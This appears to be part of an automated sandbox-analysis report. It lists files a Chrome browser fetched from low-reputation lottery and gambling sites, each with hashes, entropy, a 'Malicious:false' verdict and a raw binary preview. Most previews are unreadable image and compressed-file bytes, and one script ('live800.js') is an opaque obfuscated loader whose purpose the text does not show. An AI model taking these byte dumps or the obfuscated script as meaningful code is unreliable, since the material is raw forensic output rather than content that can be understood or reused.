                                                                                                                                                          SHA-512:4BCDB1114340EA12C7206F257231D91C196899AE9A38DCAE3BE08EC1E9099D0C6F03882912CF2A04A8B411215614C3CFF0DA71DDDB95B9B4B9F25AB8795B9792
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-qq.gzjqwlkj.com/pc/image-pc/index/121/nav/lotteryico.png
                                                                                                                                                          Preview:.PNG........IHDR............./.{.....tEXtSoftware.Adobe ImageReadyq.e<...!iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c142 79.160924, 2017/07/13-01:06:39 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC (Windows)" xmpMM:InstanceID="xmp.iid:A8767C70A6D711E9B6569DFD62A9CABC" xmpMM:DocumentID="xmp.did:A8767C71A6D711E9B6569DFD62A9CABC"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A8767C6EA6D711E9B6569DFD62A9CABC" stRef:documentID="xmp.did:A8767C6FA6D711E9B6569DFD62A9CABC"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>>L.....1IDATx..Vml.u...........v..jF.9.bB|.@4........]...,.B.NLL.......D..4`./..a....W.FWV....n}...............<....<
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 80 x 80, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):4625
                                                                                                                                                          Entropy (8bit):7.949292622828538
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:hLNRbVcJhN3p4iQyJzHZ9zrPcG52Ais1Ym4WnmrzoyM4e0BnC4FuW/ZGW3E4t:TRKhNa9yxHDrPcG5IslLCHHeIZQWz3EQ
                                                                                                                                                          MD5:B14EEB6C1819895FC6359F731F404989
                                                                                                                                                          SHA1:17C5F9027EB11CB832E4F1563AFBDAF601DFCA67
                                                                                                                                                          SHA-256:ACD92AACE1EB91B1507C1B54635EBC45A5A2E445C0D15C5376D4382B3476A932
                                                                                                                                                          SHA-512:D4DD358FBE7C471185DBBCBD5AAF50183EC788510DEF1E361E76987BE11AD00553EDFBA21B6899C063745A279D5CC51FD39BD509E1FA970B8FE06DD2D298A66D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR...P...P.............PLTE....2..FC....74.3/.:7.;8.....ur.+'.A?.<:.;8.YX.,(.41.2..`_./+.SR.qo.DA.&!.JH.1../+.=:.nl.)%.% .b`.>;.OM.96.51.&!.52....#.....VR.ig.A?. ..'"................... ..PL.!....."....."....q......"..PM.;7.......#..!..!....................".......k.........eb.".u...pn.A=. .....PL......l......us...|..H...zx.OJ...y......!.......q.....a..............{...&........UR.@:.* ......d......fd.^\.62."....[..X..O.........UR.PJ.......li.md.[X.YW.JG.HE.B?.0+.' .!..........u..v......lkR..}...ig.db.\Z.TQ.63. .......................ke.OM.IE.)$..........[W.VK.PF....".......................`^.UQ.,$......VS.ND.L@.3..3+.+(...............wo.qo.JH.A8.3(...C...........}..v.fb.`W.90.+%.-$...{.......sq._[.UKx..._Z.A>.B8. ......ql.HA.>;.@8.3*.&.....d].....I@.TL.......|w.kd.?0B......0tRNS........W!ZU.....x..zT...%.....v`.zxvuN..9E}....IDATX..Mh.`....5-.ki.......sO.MQ..IIDa9..!a.....@...?(.5.....N.!.Lw.2...E:<...h-.j?...(...}.73.d.j[Z_A.....d...<?s.eT.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1872), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1872
                                                                                                                                                          Entropy (8bit):5.873301827439445
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:VbxkoSJEgQp02jpfBCjna/fS49Aju0dcSBLI4Jc9gNPF:V7wEvtia/pAj5cSdbJcyN
                                                                                                                                                          MD5:BD44BC8DBF31E05A219C6E127C35FA91
                                                                                                                                                          SHA1:5538E8F566BFC2EA072A587275AB4824C8873EEA
                                                                                                                                                          SHA-256:C7774A8F919FF1EA51CFA68D54574BB606B10E1B8AD3060316D75243AE9E327A
                                                                                                                                                          SHA-512:1953D20330177CE178E42E08DB90C8739B8F9F54BD827B2DD45E3CA97E6EB56FEDE54B199E840CB4602873A485B6E07386B77BA963BF3D68DF43499D4CA9636E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/240516-03/static/js/components/live800.js
                                                                                                                                                          Preview:a4vjeuue("O4UwRgDghgxg1gKQM4HsB2EAUBtAjAZgDYB2AXQBoBvAIgAYAhWgWWoC4AzAVzRgBcBLdJhDleASkoBfcgEcAJgFEA4h259BaYaPL8J1TkhAACJLwBO/PtQDcAeTAArEHwB0ckO35oQABTMoIEDNeAE9MXnJqAH0okCQmFDlOABsQaioANyhkzhBWAEJaSTFrLLMjNABefkxqABE5AA5gajFyJGqXTTQ2lErMGroYCHZWnVqAOQBNAA9bVraAC36kTDFMKXJ7Jz5MFBcAWygIJRBeXiCkdexqfiQAGRQAcy906mTnrwBJOWpSMTalDkUF4UFUPAEQgkZjOnDMaEoSDMMFY1AA9Ml+BkQI1aLQXIteAdkgB+agAakw3mARjqIJAYhcTzOABV+AcQGt2osUMAWYs7gVcDokLZAmhWGgUsl2vwAF55SgBEASyjAfhyXiLVgAVnwtHIixA/CehNYhDx0hgH0MrDVGq1rFwuB1huNpt4Tst0nVWoAqoYzF80OwUELJFaUAcIJwLnJWKt1ptts5eHtDsdTudLtdbg9Pmg3h8Xmgfn8AeRgCCYNrKHcxSrweohAzKFq7i4oA4DLwvuwzFAOQBleWchnSO6PEtNyGaVtlIy8SrtpDWFcuX2LANBYOhgBke/CAqQLiRMEq1HS66QPL5x8q+WFhl4bI5KFjmC4EI0azbp+RF4YliOJ4gSRKkhSVIgDSdIXIyzIvuynJtLwp63vydwPgaqEfFAchDmcAhoE8XLPq+IDvmmX7NpoEiofW4pYdIuAgPgYjMaxAIRuQHJaokSB2rh+GEV4Twzj+EgLiAy7HqIlTqmgci8i4Q4ANJfBM1iDAASgcDiEK0tQuGiFK8OS6IoFqQQAMLoOwLgOEgrQuFZmjUbO4SSVA5T8MuLiYtiuK0FpB78C4NYggewhobyGEdIUOjhYsIKnqOUUgKlCqdBFqFIKObQZZu25BiGfRhUVga7ig5AZQAJN4M
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:WebAssembly (wasm) binary module version 0x1 (MVP)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):108015
                                                                                                                                                          Entropy (8bit):6.099067518890094
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:1536:uaglDavyQEyIWLcb/+W+2CJr71V+F3pdMBFf/kqjYf2FvZ/DKj8m9S4Aww0EEY:XlJM+W+2CJrs3pdOrkfkv0j8N2wEY
                                                                                                                                                          MD5:3875C16DCC2FC3155E37F22AA92632D0
                                                                                                                                                          SHA1:25D140EF2CF2AB3C6C9F656D2BE3C756068D5E0E
                                                                                                                                                          SHA-256:F682A144DBA0F29228190EEAAC8014C502C7539949128E9A5C8986BBEBAD8EE6
                                                                                                                                                          SHA-512:B946D8F48D3789B07E21E0EF5A761615E78F134277387E454160FA4C74EC04378DE5A5C44C459EF05C9FEFE4DF272AAB22ED3FAD259EA2D962F2E19AE77C1A19
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.asm........`.......`....`..`...`.....`....`.....`..~......`.......`......`......`..........`........`..~..`..~.`...`.....~`.~..`..|`.....|`..~....`.~......`..~.....`.........`..|.`.........`.............env.runtime.ticks...wasi_snapshot_preview1.fd_write...env.syscall/js.valueGet...env.syscall/js.valuePrepareString...env.syscall/js.valueLoadString...env.syscall/js.finalizeRef...env.syscall/js.stringVal...env.syscall/js.valueSet...env.syscall/js.valueLength...env.syscall/js.valueIndex...env.syscall/js.valueCall..........................................................................................................................................p.............A......A....A.......memory...malloc.~.free...calloc....realloc...._start....resume....go_scheduler....asyncify_start_unwind....asyncify_stop_unwind....asyncify_start_rewind....asyncify_stop_rewind....asyncify_get_state.......A...BDVXYZ[\;:..............#.A.F.@#.#.(..A.k6..#.(..".(..!. .(..!. .(..!. .(..!. .(..!. .(..!....#.A.F.@#.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 646 x 1096, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):325680
                                                                                                                                                          Entropy (8bit):7.985358831590651
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:nD521jGhgFBg89jNfqjm/o04QAyVQrJofYZl39abmE2wgik:nsKgFBhjlqjd7QArSf29Ym5ik
                                                                                                                                                          MD5:A8CB3A8609C3512F673BA85D992DF3F7
                                                                                                                                                          SHA1:BEAB059309CE123C8866CFD5CFB5E2B4BF235F87
                                                                                                                                                          SHA-256:90608F12A13907059CBDAEAB11F25D9BD512A1449C5CF8145116279CE7BDC5EC
                                                                                                                                                          SHA-512:288E94B9CDAC17A4E3FAEC718A104CA83779AAD52FF51A4B9832D92A9A3AFF3E72A6D51D2C8B76BA1B24A56B8C2B620F5B3CE2542766126D772C4A1F039FE329
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:.PNG........IHDR.......H........... .IDATx^.}..$E.....>..9..j..`......d..S....uEp]QD<..\.k].........}..+.x.;....s..=.=}UU...~/"2...:...g.g*..+.*32.E...5.y.....s.c.=.qmw..8.6..O.6....m.e..D-BP...%I.$(CR...-..$K..D$L'e...............a...I)eC.."9!.5...n.~.....?....H..@.d..,..?.Of=?5.........l...Z.K..".BO.\.....'.@Y...HD>.1IRzRP..yR..).%...).~...BNIa=@A0.G..t.=..X,..-. *..YOO..&.f...}.......G<..b....m.d.%.\...|>..j.f}[....".X..h%.k....e....h.$.......B..ZRR..D..,...l.fftiC.U.[.s........4...]G.=..=T......R.S.5..W.L%.o.].....J.~i.1E..r..CR._3...............%...)!.+.._........2....B.}".y...x.TQtu.r}.?\(........*../..._.}...w..7)...&-fE..md....V.qN.DKl)Nj.d:].;-..vZ.}..{... .6Y.a.....H#....3..X...@...f...B....z.2....b.....(0...5<itN.#....G.y....a....'P.G...$0J>o~.....K{.i.e......@.....&....-/...RV. ..jD.P...I...D....B3($.......8.....=.e...| :L...w...}..MMb...y......4.%~...~.{..e.A..n..ky....3.K..R.$....S..t.A..i.*...&0..Niw5z......~....>O.V...L.`t.4.U.i.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 55 x 55, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):2356
                                                                                                                                                          Entropy (8bit):7.768596075375429
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:sKp7E1f9H6lj5nPXuJ5Wj1jBaWI3yt/8WDUhHr5PfasAsWEn8iI1:sKpE1f1Gj5+WjDeyFPDUhLNfaCWY8Z
                                                                                                                                                          MD5:BBCE6055C4E4ED313407236ED55A2EF7
                                                                                                                                                          SHA1:8100F68C22281BA17EDAFD50705D641EA3D624A1
                                                                                                                                                          SHA-256:84860AAB7B97C5A3149C8551277C45564CEE04764196544EA538BE26391031F6
                                                                                                                                                          SHA-512:F3D022A675EBDDDBB3AD123E0D57184318747363CA753D81D0AFAA27EB112B1863AAA92E5C4942B5A52225C4F147C75246EE9F1F25FE7DB99BC559538DFBF4F6
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/lotto/lottery_qg.png
                                                                                                                                                          Preview:.PNG........IHDR...7...7......."t....PLTE....5u.hh..\..\.4u.9s.3u.9t.5t.2u..\..^..\..\..[.@r.._..[.2v.>r..^..[.2v..].3u..\..^..[.2u..[.;s..^.8t..]..[.:t.9t..[..[..\..\....8t..\..[.5u.3u.:s.Hp.bi.Ep..].2v..^..].Lo..^.Cq.Nn.vd.sd..^.Pn.xd..^..b..\.yc..a.Ar.jg.qe.=s.Jo.7t.]j.hh.Sm.=q.Jp.._.of.Ul.}b.eh.mf.{c.Wl.fh._i....Ol.Zi....@q..`..`..].Zk.lg.|a..a..^..].............>t....gf.......d..ag.rf..^......................Gz.en.}`......................}..c..X..R}.Mz.Iv.Yt.Oo..l.........................s..z...z.`x..w.|r.wq..h..f...............................u........m........r.........}.rz.yy.Kw.ht.zn..c...........................................................z........|..y.....m..p...s..q.qq.`q..o..m.mk.....................x.....h........^.....k..Q..t..M~.h{..v.Wo.................~..m.8l.~h.._m.s....*tRNS....G...G...................JJH.........=Kr....IDATH..]H.Q............}<..X..f...b.|.AVh-...Z...[u..1uz.......b]T.F.AE..]...c...s......=....?.sx..C..P...o.u.-..R.By...T...;.."q..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 191 x 120, 8-bit/color RGB, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):42269
                                                                                                                                                          Entropy (8bit):7.991155333809229
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:768:fQzyfyB27wt3UHio4R3YOuvY0cyxiDLQwOCM1gPRdi0/NlsGB461pwT1sXe0sShi:/fH8VUuR3YOuwJOinQwOCM1gPjN/Nmku
                                                                                                                                                          MD5:9DA4B97FE599D853474EF944538CA0ED
                                                                                                                                                          SHA1:ED200EE96F3F0CD026312F4C412C5205668D2A86
                                                                                                                                                          SHA-256:6A11ED640A05B24A7864374115EA9877105A5C4916DA7F7B58EAC19E0B76E067
                                                                                                                                                          SHA-512:470ECC69C0EF4B59086BF099768034D8D43A53C2F37AA498BC533ED041289154F9EAC53D3108399E6EF629CBD9EA9EF8F084D18EF9BFE31194D50A28614ABDDC
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/245/games/ag/ag_game_02.png
                                                                                                                                                          Preview:.PNG........IHDR.......x.....,e.]....tEXtSoftware.Adobe ImageReadyq.e<...&iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CC 2017 (Windows)" xmpMM:InstanceID="xmp.iid:2F37947F7B7B11E88EB6F7B28325EC2F" xmpMM:DocumentID="xmp.did:2F3794807B7B11E88EB6F7B28325EC2F"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:2F37947D7B7B11E88EB6F7B28325EC2F" stRef:documentID="xmp.did:2F37947E7B7B11E88EB6F7B28325EC2F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>_.......IDATx...$.u../......k.........."HQ.-...X..?..../3g..3.<.s..x<.d...J.(..@.;.h...U]{U.{..{....@..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 126 x 126, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):23429
                                                                                                                                                          Entropy (8bit):7.98129690283617
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:384:sCmmCX0gyK97AAcXtWaTn8sphrQVoqNXQE1dejsClzHCGXA6:srZXKK9taT8ChrwoqNgwejxrB
                                                                                                                                                          MD5:8BC8E468216F92359481D7A92A5C6BA7
                                                                                                                                                          SHA1:72170BA40780D74A2863CC0619DFC04123EB703E
                                                                                                                                                          SHA-256:758A31285776825E88738F6663758D9C766A665480606EFDEAD210202C0C19F1
                                                                                                                                                          SHA-512:7F176B60B6F12DD72F40362FB190BE710ACD611D39547E83BE6C1C106548C6718759A5013B7A23ECC562A1103344B3C0E6CA88055EA8517ABE2C37623C1C56ED
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/index/312/nav/sponsor/04.png
                                                                                                                                                          Preview:.PNG........IHDR...~...~......#......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C....Z.IDATx..w.e.Y...:...{RO.4.4.V.e..A6....M..ey`.....].e1..v..aq......r.F.4.3..{.{:w.|.......[..W.s..}..T.c)c..?.!..E ..M.m.Z..^....!...@...W.^..n/............n_..`.@..l......{m.{.`.5......y`..U......~.|..n/..t!.....P....h...d.5..Q... .........}_...3..0a.~_q.......}.#@oG.SAX.F(.....p..<..~.c.;..|...x....FD...,....{'>b`..~...F.>..........MoA(.m....h.......`.B.=.R..........>....0.4.....m;B.......s..8. ..w{..7.....5.....p"D....i....C.o@..P.n.m..2^5].h.V.*t.}n.>.......n.1...:.3.P.......^.......J* .*.'....9 .!..........N&'..n~.r8.......b$.@=.........z.|...5.N!V.qRk.:....!..Pn...)d.......[..<i...B.5R..P\...J.........p...9......"^2.R...<p..]..n.A.......u.."#.n.t..+...>.2.A9.p..^`?..=..n..>......Ad.......yn/.p..^....,...c.z../..P..K.r.2.....y..C.3v.....|.Q.."........].b....!D...`.!rw..>.:....!..+..v~]...}...g..o...6...v..=v-.....a.*`..).).Y.._h7m
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 3709
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1605
                                                                                                                                                          Entropy (8bit):7.851692774237802
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:48:X6cMAz2z69hKV/g/utBf1e70wVnkCB9xLPNA:lzI69cVrRApVnkCpPNA
                                                                                                                                                          MD5:2CB7E39A806FF00165DA309D1611B0CD
                                                                                                                                                          SHA1:716DC75A1B27DF6E3B027D2DB22A7A547B36DD43
                                                                                                                                                          SHA-256:8E7FBF1BD2CD01679A539D50758E780D0CD561165FCB7A72CCEFC9DE6E75E2E9
                                                                                                                                                          SHA-512:F0CA82F0AEB455B98A747D6374BCD2D52CBEDF6DCCBB824671C586608E3E01A6D755CF708D8E729A0C019BDAD5ECCB69940F6160CADFDCD0451FA5694E9CD613
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          Preview:..........|WKo.6...W.:.^..^..:F....^'ho..]1.H...V..(...%@.^z.@....._....^...X....y|...8b.....L.]..=,.D.4O..{hN.vow......`..........HgF..R&....n...z......^.....)...........4=B9......s....O..}....hz..0.'...}..ON....5.D...Q..../T.`G....\..<c..V_Y.Zf.N..).+o....u$......1.8ER.S.....(.GbA.4.D.a+...c$.k..........S."].P...K.0....Q...R].....!...>..S....K...,4v..Sq.Vg..`.....Q..Dj:...X ".!Hc.X.....b"&R...c......{...H7...\...Wd......)..izW...)SD...+5...H2..T....<.d..x."~.G9~.j*x.....E..^.\.Kf...Q..~.Tm.F2O..gR...Sxm.eb..H&Ut.&.g.Bi.=&.8%.......|;A.)n.Mf0x.O3F./]..D....I.H..P.L...R.)..B2.....Rg..W.1b.".X:.K.....@..&...S..=....Xp-.........'Y..y.a.vh.g.=%.......Y,.....]..C..@U..yF...C.H......X.T.v:a.2...R.x$6".tPJ;Q'....B./..f%..(.....u.W....&.....j.8C.......qyD...v..{.Y.J&.|....b...7..j;.7`jpjN.4,........u.5Sc.BJ.....d.........(...G..c}L.2.....*...u.j..DYt.HSp3.B..U.5.[...3.S..#.P......L.FhxuJSU.W..u<.u-..^I.5L].5.(.qi9.!.....L....RSj.ee{}..K...$..V...$
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):6185
                                                                                                                                                          Entropy (8bit):7.907639165681983
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:129vg9utD8sljYkMGY39+VCNqKjuh+2NJBRDqDtg4194WhjyIcHlChU:V9ud07G29+dKSxTBRGlrj3i
                                                                                                                                                          MD5:1C68D87ED2F4155CA120009E19F283BA
                                                                                                                                                          SHA1:888ECEA7D93574BFCA0528C162EC53824668A118
                                                                                                                                                          SHA-256:5468A22A552ADF8C18534820E6BE501E22906E759923979A371177F5EDC0A364
                                                                                                                                                          SHA-512:B3AD0F852D2445CB551A45A19F2695F550953B369657D9F0F4C0F3F2D603B82ED609F5AD7C2A97E2820610FF388D52DD9DB1075F28DE954B60AC6DFA005EECE0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb-hw.czwygs.com/pc/image-pc/nav/icon-b/sport_bgcrown.png
                                                                                                                                                          Preview:.PNG........IHDR...<...<.....:..r....tEXtSoftware.Adobe ImageReadyq.e<...$iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.dabacbb, 2021/04/14-00:39:44 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop 22.5 (Windows)" xmpMM:InstanceID="xmp.iid:A7C9DA57268711ECBD13FB4B0025D288" xmpMM:DocumentID="xmp.did:A7C9DA58268711ECBD13FB4B0025D288"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:A7C9DA55268711ECBD13FB4B0025D288" stRef:documentID="xmp.did:A7C9DA56268711ECBD13FB4B0025D288"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>.p.....IDATx..[....y....s..... .!.1.....l.%...q.......L...p.a(...#...A..$.6...........!......~G...gvv%%..q...wf
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (587), with no line terminators
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):587
                                                                                                                                                          Entropy (8bit):5.037025933428312
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:12:Ab8dkKeCxyWF0gRvJHrtbFKNkM+fpYzObOTks0JM9EaMCz:UWkKeFARvJVgNQpYzkOV8IV9
                                                                                                                                                          MD5:286675B3C67670C0F14297E633BE05A4
                                                                                                                                                          SHA1:36A200D8AB5D5E37E328700DF90D061F268C57CC
                                                                                                                                                          SHA-256:6F1E6A7E89A7B4451921BA1D6EA506A9855D4BFF2EC5F25587BF066516ACF025
                                                                                                                                                          SHA-512:D8A6C2C2D605CF93D1397B487B6ECCD7A115DC8334877F555A1F0E7ACB031A57F169F3A4E4CC592C9AA7862ABB8440AE8467B65E2FCC0D60F967678F0BC2D444
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://8vpfnx.eveday.me/061410/rcenter/common/js/gamebox/common/urlencode.js
                                                                                                                                                          Preview:function UrlEncode(str){var hex="";var i,t;for(i=0;i<str.length;i++){t=hexfromdec(str.charCodeAt(i));if(t=="25"){t=""}hex+="%"+t}return hex}function hexfromdec(num){if(num>65535){return("err!")}first=Math.round(num/4096-0.5);temp1=num-first*4096;second=Math.round(temp1/256-0.5);temp2=temp1-second*256;third=Math.round(temp2/16-0.5);fourth=temp2-third*16;return(""+getletter(third)+getletter(fourth))}function getletter(num){if(num<10){return num}else{if(num==10){return"A"}if(num==11){return"B"}if(num==12){return"C"}if(num==13){return"D"}if(num==14){return"E"}if(num==15){return"F"}}};
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, max speed, from Unix, original size modulo 2^32 18388
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4084
                                                                                                                                                          Entropy (8bit):7.94569233466241
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:mwcWOzIzqP0Drv6oQckG8NF/xiWqpvCkxpR:RwIzXscRqRxiWkTpR
                                                                                                                                                          MD5:106BA6DD5A7918BDB0DD73A4594C5684
                                                                                                                                                          SHA1:5DA4B04A3D47B087CDC723C63606CCD53D61C52F
                                                                                                                                                          SHA-256:4BE1B19DD11804094ACA2A4C9E62C22AFD21B14EAFFCA0874E87A3441BE04966
                                                                                                                                                          SHA-512:1B1589144CCB52B8F53C0D6862E626808F70748B3F4E3DCB950F985A8C2200E7CE7FAD056AC6645FAD84063178DC517FAAAC7ADC2EF18BA20D19666C8CA3833E
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://wssa-301.shiwanxin.com:1186/ocs/zbw?r=2454927415
                                                                                                                                                          Preview:...........WKo.6.>o~E.^c.....E.=t...........E.....z.R..zk` ...7.of......J..=..*E.r].=t..(..R..o.b.m.%.N.....&=|8.C/.I ....N.....P......_.o....7._P..N...=........=......$..*..jc...^..........._.>....f..s...u).}".H......t}:].YO^+.C..K?=....p.CD=._......%.{.Y'Y(.4..'..K...aV..]!6....Y!.*.e.EY.K./(.-h.t.._.\.f....C..=..K.~rV6......i..h.x~.{2U.G.....T..n..j.~.^:........s..U`N]}j1.T%....)7.u.6G..y8.....@.H..zz|...y"...DZTJ.}.'d.I......eQ.~..X*..Q.>.NO...avi......gA.V.O.\...O...."K<..%........,....w.V&...gA.k..L.K....!3....y..Y.WG...d;l0...go_.HxU.......b.|..(.f^.JE....=w<..i...q~%.<..G}.r..3..U.e)..;...DX.-.r.g.3....aKB.I..Xhy.R.b......W.......K....:p......y8.a...%`..n..E`e..JyA..R`lwK...........,....u=.l..>f. .~....._....z...7.Nwow..s..S..s....,..m....{+<h.....v/.'.%a...dd....Z.Pq..0.`~Cg.wx:.".-@0.I>..a.S.A.PLL.s.....309......)..:......s.X.D....w#h.[m.m.y....0.% .Iv.a+..D.. ..N....S../.BM..........gd..2.s.5..v..lg.c.;.....v..`...;.1_..C...2..0
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:PNG image data, 80 x 80, 8-bit colormap, non-interlaced
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4344
                                                                                                                                                          Entropy (8bit):7.934285776109551
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:96:hyf9hfD5+055QHplysd0G5aOnsU8OSIMVZflsJioAa4O+qIV+vWajjtJ:ofr5+WiUq04UOn+ZflsJHAa4hVUj
                                                                                                                                                          MD5:206BF8E3A785D8D03E741435773979E5
                                                                                                                                                          SHA1:E52174C83223D749FEFAFD6253BDBFFAB5F9B0A2
                                                                                                                                                          SHA-256:90B4EEBC85E0F63B7DB76152D0246083CDE3D05B1C3C56979B787BD7C5BE143F
                                                                                                                                                          SHA-512:CCFE6841C3D495ED4011350A004B3A298F4F5D2D249CA77F145B89157678702065EFD06133B668E7F528C598C967C9E326DC1C51415CCCFEB5D8C2F464C18DE4
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:low
                                                                                                                                                          URL:https://zb1-hw.qectyoua.com/pc/image-pc/lotto/lottery_1801.png
                                                                                                                                                          Preview:.PNG........IHDR...P...P.............PLTE....MM.......cc.YY.TT.XX....aa.JJ..............MM....ZZ.PP.ee.vv....KL.wv.hi....VV.st.II.__.....II..............#.............YRs.........yz. !.h`.......lc.bY.^V.......&%.tt.##.CCy......og.kb................LK.gg.e\.\\.ON.31.2/.............;<..........VV.94.,,................BB.77.2/.**....1*....LG.;;.......NI.@>....nn.nk.c^.SQ.UO.II.GF.A;.30....CB..........bb.77.43.&......}}.sr.=9.:5..,...........xx.eZ.^Y.mm.DD.GB..=....................ZU.QO.)(.+$.V............../...j......KK..7....j..Q.ZQ.FD.&$...UM.+&\.......ss.VK.**...`....c.>>.!..............~y..x.us..O.G?....(&.......@A.Q:..1...d.........[[.pC..A.1.............\.............y.lm.^[.@."#............o.LL.,........._.M.W(.s...........u..f.zb..[../.J".B..}d.`...... Y...".k...#tRNS.. ...X.V!.Q.\.....yxx......x..z..0.....IDATX..O.`........Bd`85qnH..CCl....v<,`r!..4D.j.....BC...+.\..]t...V.......;..c.......^....B.k.hm#..{....7..`E.L..MS.u...`.......`...4D.4.
